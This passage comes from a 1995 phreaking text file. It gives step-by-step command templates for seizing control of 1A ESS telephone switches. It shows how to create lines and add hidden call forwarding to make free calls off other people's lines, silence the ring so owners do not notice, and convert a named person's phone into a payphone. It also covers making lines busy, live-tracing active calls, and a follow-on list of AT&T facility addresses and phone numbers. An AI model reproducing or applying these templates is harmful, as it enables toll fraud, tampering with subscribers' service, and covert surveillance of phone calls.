|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|||
|
Another nice use for the VFY command is to see what is on a line's speed
|
|||
|
calling list. Replace XXXXXXX with the target phone number. One devious
|
|||
|
use is to look at the CO's speed call list to find other internal telco
|
|||
|
numbers.
|
|||
|
|
|||
|
VFY-LIST-09XXXXXXX020000
|
|||
|
09=mask 02=single list (one digit speed calling)
|
|||
|
20=double list (two digit speed calling)
|
|||
|
28= " "
|
|||
|
36= " "
|
|||
|
44= " "
|
|||
|
|
|||
|
|
|||
|
To Build a Line
|
|||
|
-=-=-=-=-=-=-=-
|
|||
|
The recent change command (RC) is used to create and modify lines. Because
|
|||
|
RC commands are usually very long and complex, they are typed on multiple
|
|||
|
lines to simplify them. Each subfield of the data section of the command is
|
|||
|
typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
|
|||
|
To create a line, you specify LINE in the identification field. Before
|
|||
|
a line can be created, you must first locate an unused number by using the
|
|||
|
VFY-DN command explained above. Once a free number has been found, you
|
|||
|
use the VFY-LEN to find an available LEN. To build a new line, follow
|
|||
|
these steps:
|
|||
|
|
|||
|
First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type
|
|||
|
in the RC commands using the following commands as a template:
|
|||
|
|
|||
|
RC:LINE:\ (create a line)
|
|||
|
ORD 1\ (execute the command immediately)
|
|||
|
TN XXXXXXX\ (telephone number)
|
|||
|
LEN XXXXXXXX\ (len found from above)
|
|||
|
LCC 1FR\ (line class code 1fr)
|
|||
|
CFV\ (call forward)
|
|||
|
XXX 288\ (type XXX, space, then the three digit PIC)
|
|||
|
ld carrier - 222 - MCI
|
|||
|
288 - AT&T
|
|||
|
333 - Sprint, etc.)
|
|||
|
! (BEWM, don't forget the ctrl-d!!)
|
|||
|
|
|||
|
(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
|
|||
|
has taken affect)
|
|||
|
|
|||
|
|
|||
|
Creating Call Forwarding Numbers
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
The call forwarding feature is the most important feature for hackers. By
|
|||
|
creating a line or modifying an existing line with call forwarding, you can
|
|||
|
than use it to make free phone calls. You set the line to call forward/
|
|||
|
no ring and then give it the call forwarded number. This will allow you
|
|||
|
to call the modified line and be instantly forwarded to your pre-chosen
|
|||
|
destination.
|
|||
|
|
|||
|
First create a line using RC:LINE:, then modify the line using the following
|
|||
|
commands as a template.
|
|||
|
|
|||
|
RC:CFV:\ (add call forwarding to a line.. begin: )
|
|||
|
ORD 1\ (execute the command immediately)
|
|||
|
BASE XXXXXXX\ (base number you are changing)
|
|||
|
TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
|
|||
|
PFX\ (set prefix to 1 if ld)
|
|||
|
! (BEWM)
|
|||
|
|
|||
|
|
|||
|
To Change Call Forward Number
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|||
|
It is safer to modify an existing call forward than to create a new line
|
|||
|
solely for this purpose. You can use the VFY command and EXMATCH for CFB to
|
|||
|
find lines with call forwarding. Before you can change the call forwarding
|
|||
|
'TO' number you must delete the old one. Remove call forward number using
|
|||
|
CFV:OUT with the template below.
|
|||
|
|
|||
|
RC:CFV;OUT:\ (remove call forward number...begin: )
|
|||
|
ORD 1\ (execute command immediately)
|
|||
|
BASE XXXXXXX\ (number to remove it from)
|
|||
|
! (Yeeee-Hahhhahah)
|
|||
|
|
|||
|
|
|||
|
Make Call Forward Not Ring
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
The only drawback to call forwarding off someone's line is if rings they
|
|||
|
might answer. To get around this, you add the call-forward no-ring option
|
|||
|
(ICFRR) using the following as a template.
|
|||
|
|
|||
|
RC:LINE;CHG:\ (recent change line to be specified)
|
|||
|
ORD 1\ (execute command immediately)
|
|||
|
TN XXXXXXX\ (number you wanna fuck with)
|
|||
|
ICFRR\ (this takes the ring off)
|
|||
|
! (Go!)
|
|||
|
|
|||
|
|
|||
|
Adding a feature to a line
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
The RC:LINE;CHG: can also be used to add any other call feature. Use the
|
|||
|
same template but change the feature.
|
|||
|
|
|||
|
RC:LINE;CHG:\ (this is used for changing features)
|
|||
|
ORD 1\ (order number)
|
|||
|
TN XXXXXXX (telephone number you are fucking with)
|
|||
|
TWC\ (replace this with any feature you wish)
|
|||
|
! (Fire!)
|
|||
|
|
|||
|
|
|||
|
Removing a Feature
|
|||
|
-=-=-=-=-=-=-=-=-=
|
|||
|
Use the NO delimiter to remove a feature from a line.
|
|||
|
|
|||
|
RC:LINE;CHG:\ (change a feature)
|
|||
|
ORD 1\ (effective immediately)
|
|||
|
TN XXXXXXX\ (telephone number)
|
|||
|
CFV NO\ (feature followed by NO)
|
|||
|
! (Boo-Ya!)
|
|||
|
|
|||
|
|
|||
|
Change Phone number into payphone
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|||
|
You've read about in the Hacker Crackdown, now you too can be 31337 and
|
|||
|
change Gail Thackery's phone into a payphone. In fact you can change the
|
|||
|
line class code (LCC) to anything you want. To display the LCC of a line
|
|||
|
use the following and replace the XXXXXXX with the line you wish to view.
|
|||
|
|
|||
|
VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
|
|||
|
DTF = Payphone
|
|||
|
1FR = Flat Rate
|
|||
|
1MR = Measured Rate
|
|||
|
1PC = One Pay Phone
|
|||
|
CDF = DTF Coin
|
|||
|
PBX = Private Branch Exchange
|
|||
|
CFD = Coinless(ANI7) Charge-a-call
|
|||
|
INW = InWATS (800!@#)
|
|||
|
OWT = OutWATS
|
|||
|
PBM = O HO/MO MSG REG (NO ANI)
|
|||
|
PMB = LTG = 1 HO/MO (Regular ANI6)
|
|||
|
(ani6 and ani7 - only good for DMS)
|
|||
|
|
|||
|
To change the line into a payphone use the RC:LINE;CHG command and modify
|
|||
|
the LCC like the example below.
|
|||
|
|
|||
|
RC:LINE;CHG;\ (this is used for changing features)
|
|||
|
ORD 1\ (order number)
|
|||
|
TN XXXXXXX\ (telephone number you are fucking with)
|
|||
|
LCC DTF\ (line class code you are changing to)
|
|||
|
! (Make it so.)
|
|||
|
|
|||
|
*(You may have to remove some LASS features when doing this)*
|
|||
|
|
|||
|
|
|||
|
To Kill a Line and Remove It Permanently
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
If you need to delete a line you have created (or haven't) use the following
|
|||
|
syntax.
|
|||
|
|
|||
|
RC:LINE;OUT:\ (remove line)
|
|||
|
ORD 1\ (effective immediately)
|
|||
|
TN XXXXXXX\ (on this number)
|
|||
|
! (GO!)
|
|||
|
|
|||
|
|
|||
|
Monitoring Phone Calls
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
There are powerful utilities to monitor calls and affect phone lines
|
|||
|
available on a 1A. The T-DN- commands allow you to check the current
|
|||
|
status of line and make it busy or idle. If a line happens to be active
|
|||
|
you can use the NET-LINE- command to trace the call and find the numbers
|
|||
|
for both calling parties.
|
|||
|
|
|||
|
T-DN-RD XXXXXXX. See if call in progress.
|
|||
|
output: =1 line busy
|
|||
|
=0 line idle
|
|||
|
T-DN-MB XXXXXXX. Make line busy.
|
|||
|
T-DN-MI XXXXXXX. Make line idle.
|
|||
|
NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
|
|||
|
switch.
|
|||
|
NET-TNN-XXXXXX Same as above for trunk trace
|
|||
|
|
|||
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
Appendix 1 - Common output messages seen on 1A switches
|
|||
|
-=-=-=-=-=
|
|||
|
|
|||
|
** ALARM **
|
|||
|
|
|||
|
AR01 Office alarm
|
|||
|
AR02 Alarm retired or transferred
|
|||
|
AR03 Fuse blown
|
|||
|
AR04 Unknown alarm scan point activated
|
|||
|
AR05 Commercial power failure
|
|||
|
AR06 Switchroom alarm via alarm grid
|
|||
|
AR07 Power plant alarm
|
|||
|
AR08 Alarm circuit battery loss
|
|||
|
AR09 AMA bus fuse blown
|
|||
|
AR10 Alarm configuration has been changed (retired,inhibited)
|
|||
|
AR11 Power converter trouble
|
|||
|
AR13 Carrier group alarm
|
|||
|
AR15 Hourly report on building and power alarms
|
|||
|
|
|||
|
** AUTOMATIC TRUNK TEST **
|
|||
|
AT01 Results of trunk test
|
|||
|
|
|||
|
** CARRIER GROUP **
|
|||
|
CG01 Carrier group in alarm
|
|||
|
CG03 Reason for above
|
|||
|
|
|||
|
** COIN PHONE **
|
|||
|
CN02 List of pay phones with coin disposal problems
|
|||
|
CN03 Possible Trouble
|
|||
|
CN04 Phone taken out of restored service because of possible coin fraud
|
|||
|
|
|||
|
** COPY **
|
|||
|
COPY Data copied from one address to another
|
|||
|
|
|||
|
** CALL TRACE **
|
|||
|
CT01 Manually requested trace line to line, information follows
|
|||
|
CT02 Manually requested trace line to trunk, information follows
|
|||
|
CT03 Intraoffice call placed to a number with CLID
|
|||
|
CT04 Interoffice call placed to a number with CLID
|
|||
|
CT05 Call placed to number on the CI list
|
|||
|
CT06 Contents of the CI list
|
|||
|
CT07 ACD related trace
|
|||
|
CT08 ACD related trace
|
|||
|
CT09 ACD related trace
|
|||
|
|
|||
|
** DIGITAL CARRIER TRUNK **
|
|||
|
DCT COUNTS Count of T carrier errors
|
|||
|
|
|||
|
** MEMORY DIAGNOSTICS **
|
|||
|
DGN Memory failure in cs/ps diagnostic program
|
|||
|
|
|||
|
** DIGITAL CARRIER "FRAME" ERRORS **
|
|||
|
FM01 DCT alarm activated or retired
|
|||
|
FM02 Possible failure of entire bank not just frame
|
|||
|
FM03 Error rate of specified digroup
|
|||
|
FM04 Digroup out of frame more than indicated
|
|||
|
FM05 Operation or release of the loop terminal relay
|
|||
|
FM06 Result of digroup circuit diagnostics
|
|||
|
FM07 Carrier group alarm status of specific group
|
|||
|
FM08 Carrier group alarm count for digroup
|
|||
|
FM09 Hourly report of carrier group alarms
|
|||
|
FM10 Public switched digital capacity failure
|
|||
|
FM11 PUC counts of carrier group errors
|
|||
|
|
|||
|
** MAINTENANCE **
|
|||
|
MA02 Status requested, print out of MACII scratch pad
|
|||
|
MA03 Hourly report of system circuits and units in trouble
|
|||
|
MA04 Reports condition of system
|
|||
|
MA05 Maintenance interrupt count for last hour
|
|||
|
MA06 Scanners,network and signal distributors in trouble
|
|||
|
MA07 Successful switch of duplicated unit (program store etc.)
|
|||
|
MA08 Excessive error rate of named unit
|
|||
|
MA09 Power should not be removed from named unit
|
|||
|
MA10 OK to remove paper
|
|||
|
MA11 Power manually removed from unit
|
|||
|
MA12 Power restored to unit
|
|||
|
MA13 Indicates central control active
|
|||
|
MA15 Hourly report of # of times interrupt recovery program acted
|
|||
|
MA17 Centrex data link power removed
|
|||
|
MA21 Reports action taken on MAC-REX command
|
|||
|
MA23 4 minute report, emergency action phase triggers are inhibited
|
|||
|
|
|||
|
** MEMORY **
|
|||
|
MN02 List of circuits in trouble in memory
|
|||
|
|
|||
|
** NETWORK TROUBLE **
|
|||
|
NT01 Network frame unable to switch off line after fault detection
|
|||
|
NT02 Network path trouble Trunk to Line
|
|||
|
NT03 Network path trouble Line to Line
|
|||
|
NT04 Network path trouble Trunk to Trunk
|
|||
|
NT06 Hourly report of network frames made busy
|
|||
|
NT10 Network path failed to restore
|
|||
|
|
|||
|
** OPERATING SYSTEM STATUS **
|
|||
|
OP:APS-0
|
|||
|
OP:APSTATUS
|
|||
|
OP:CHAN
|
|||
|
OP:CISRC Source of critical alarm, automatic every 15 minutes
|
|||
|
OP:CSSTATUS Call store status
|
|||
|
OP:DUSTATUS Data unit status
|
|||
|
OP:ERAPDATA Error analysis database output
|
|||
|
OP:INHINT Hourly report of inhibited devices
|
|||
|
OP:LIBSTAT List of active library programs
|
|||
|
OP:OOSUNITS Units out of service
|
|||
|
OP:PSSTATUS Program store status
|
|||
|
|
|||
|
** PLANT MEASUREMENTS **
|
|||
|
PM01 Daily report
|
|||
|
PM02 Monthly report
|
|||
|
PM03 Response to a request for a specific section of report
|
|||
|
PM04 Daily summary of IC/IEC irregularities
|
|||
|
|
|||
|
** REPORT **
|
|||
|
REPT:ADS FUNCTION Reports that a ADS function is about to occur
|
|||
|
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
|
|||
|
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
|
|||
|
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
|
|||
|
REPT:ADS PROCEDURAL ERROR You fucked up
|
|||
|
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
|
|||
|
REPT:PROG CONT OFF-NORMAL System programs that are off or on
|
|||
|
REPT:RC CENSUS Hourly report on recent changes
|
|||
|
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
|
|||
|
|
|||
|
** RECENT CHANGE **
|
|||
|
RC18 RC message response
|
|||
|
|
|||
|
** REMOVE **
|
|||
|
RMV Removed from service
|
|||
|
|
|||
|
** RESTORE **
|
|||
|
RST Restored to service status
|
|||
|
|
|||
|
** RINGING AND TONE PLANT **
|
|||
|
RT04 Status of monitors
|
|||
|
|
|||
|
** SOFTWARE AUDIT **
|
|||
|
SA01 Call store memory audit results
|
|||
|
SA03 Call store memory audit results
|
|||
|
|
|||
|
** SIGNAL IRREGULARITY **
|
|||
|
SIG IRR Blue box detection
|
|||
|
SIG IRR INHIBITED Detector off
|
|||
|
SIG IRR TRAF Half hour report of traffic data
|
|||
|
|
|||
|
** TRAFFIC CONDITION **
|
|||
|
TC15 Reports overall traffic condition
|
|||
|
TL02 Reason test position test was denied
|
|||
|
TL03 Same as above
|
|||
|
|
|||
|
** TRUNK NETWORK **
|
|||
|
TN01 Trunk diagnostic found trouble
|
|||
|
TN02 Dial tone delay alarm failure
|
|||
|
TN04 Trunk diag request from test panel
|
|||
|
TN05 Trunk test procedural report or denials
|
|||
|
TN06 Trunk state change
|
|||
|
TN07 Response to a trunk type and status request
|
|||
|
TN08 Failed incoming or outgoing call
|
|||
|
TN09 Network relay failures
|
|||
|
TN10 Response to TRK-LIST input, usually a request from test position
|
|||
|
TN11 Hourly, status of trunk undergoing tests
|
|||
|
TN16 Daily summary of precut trunk groups
|
|||
|
|
|||
|
** TRAFFIC OVERLOAD CONDITION **
|
|||
|
TOC01 Serious traffic condition
|
|||
|
TOC02 Reports status of less serious overload conditions
|
|||
|
|
|||
|
** TRANSLATION ** (shows class of service, calling features etc.)
|
|||
|
TR01 Translation information, response to VFY-DN
|
|||
|
TR03 Translation information, response to VFY-LEN
|
|||
|
TR75 Translation information, response to VF:DNSVY
|
|||
|
** **
|
|||
|
TW02 Dump of octal contents of memory
|
|||
|
|
|||
|
Trace Output Appearance (COT - Customer Oriented Trace)
|
|||
|
A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
|
|||
|
CPN 212 382 8923 <-- WHO CALLED
|
|||
|
|
|||
|
01/14/95 22:03:02 <-- TIME/DATE
|
|||
|
#236 <-- JOB NUMBER
|
|||
|
|
|||
|
|
|||
|
Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
|
|||
|
-=-=-=-=-=
|
|||
|
|
|||
|
RMV::NPC 69!
|
|||
|
UTL::QRY.CMAP 136!
|
|||
|
UTL::QRY.SCON to 135! (as far out as to 12003!)
|
|||
|
UTL::QRY.SCON 13615/01!
|
|||
|
UTL::QRY.ALMS!
|
|||
|
UTL::QRY,WHO!
|
|||
|
UTL::QRY,ALL!
|
|||
|
UTL::QRY,FPKG!
|
|||
|
UTL::QRY,UNIT1,FTMI1, EQL
|
|||
|
GRTH::UNIT1! (FT100) <-- comment written by command
|
|||
|
GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
|
|||
|
UTL::QRY.!
|
|||
|
RMV::LINK 3!
|
|||
|
DGN::LINK 3!
|
|||
|
RST::LINK 3!
|
|||
|
UTL::QRY.TPS!
|
|||
|
|
|||
|
RST::TAPE! (This and the next two commands were
|
|||
|
UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
|
|||
|
RMV::TAPE! obvious)
|
|||
|
|
|||
|
SDIS::FROM 11204/03.TO 11204/04!
|
|||
|
UTL::QRY.SCON.CH.TO 11204!
|
|||
|
UTL::QRY.CMAP.TO 11204/03!
|
|||
|
UTL::QRY,CMAP 01117!
|
|||
|
SCON::RATE 96.FROM 11204/03.TO 11204/4!
|
|||
|
LOGIN::USER DAX\
|
|||
|
UTL::EQD,NPCS!
|
|||
|
ADD::LINK 2,NPCAD E!
|
|||
|
|
|||
|
UTL::LOC,ETSI 101!
|
|||
|
|_|____________Bay (These show physical locations
|
|||
|
|____________Unit of trunks)
|
|||
|
|
|||
|
UTL::LOC,NPC 01117!
|
|||
|
output - 1-01-38
|
|||
|
|__|__|_________Bay
|
|||
|
|__|_________Unit
|
|||
|
|_________38(1/8) inches
|
|||
|
|
|||
|
|
|||
|
Appendix 3 - Suggested reading
|
|||
|
-=-=-=-=-=
|
|||
|
|
|||
|
Acronyms 1988 (Phrack #20, file 11)
|
|||
|
Central Office Operations by Agent Steal (LoDTJ #4, file 4)
|
|||
|
ESS & 1A Switching Systems by Ninja Master
|
|||
|
The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
|
|||
|
Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
|
|||
|
Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
|
|||
|
Operator Services Position System by Bandito (Phun #5, file 8)
|
|||
|
Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
|
|||
|
|
|||
|
__________________________________________________________________________
|
|||
|
(C)opywrong 1995, DeadKat Inc.
|
|||
|
All wrongs denied.
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> Thank you for abusing AT&T <20>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Part II
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> by Major & Dead Kat
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Some of the "Frequently Visited AT&T Locations":
|
|||
|
|
|||
|
LOCATION CITY ST/ZIP TELEPHONE
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~
|
|||
|
AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000
|
|||
|
BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300
|
|||
|
MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200
|
|||
|
AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000
|
|||
|
LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411
|
|||
|
AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000
|
|||
|
PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000
|
|||
|
AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100
|
|||
|
PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666
|
|||
|
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100
|
|||
|
AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799
|
|||
|
LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000
|
|||
|
CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200
|
|||
|
AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223
|
|||
|
AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390
|
|||
|
VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611
|
|||
|
AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649
|
|||
|
AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200
|
|||
|
AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000
|
|||
|
AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200
|
|||
|
SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000
|
|||
|
HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000
|
|||
|
AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000
|
|||
|
AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000
|
|||
|
SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300
|
|||
|
AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800
|
|||
|
PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911
|
|||
|
AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600
|
|||
|
DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000
|
|||
|
AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000
|
|||
|
AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000
|
|||
|
AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001
|
|||
|
DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200
|
|||
|
DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200
|
|||
|
AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813
|
|||
|
AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011
|
|||
|
AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100
|
|||
|
AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000
|
|||
|
AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800
|
|||
|
AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200
|
|||
|
AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800
|
|||
|
ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721
|
|||
|
CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070
|
|||
|
AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600
|
|||
|
AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300
|
|||
|
WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000
|
|||
|
AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000
|
|||
|
AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454
|
|||
|
AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200
|
|||
|
AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
|
|||
|
AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
|
|||
|
AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200
|
|||
|
AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400
|
|||
|
AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000
|
|||
|
AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000
|
|||
|
AT&T MICROELECT.9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000
|
|||
|
AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100
|
|||
|
AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100
|
|||
|
ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000
|
|||
|
AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200
|
|||
|
AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000
|
|||
|
AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000
|
|||
|
ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000
|
|||
|
ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000
|
|||
|
AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126
|
|||
|
ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000
|
|||
|
ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900
|
|||
|
AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800
|
|||
|
ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100
|
|||
|
ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000
|
|||
|
AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200
|
|||
|
AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300
|
|||
|
ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000
|
|||
|
AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300
|
|||
|
AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000
|
|||
|
AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100
|
|||
|
AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100
|
|||
|
AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000
|
|||
|
AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320
|
|||
|
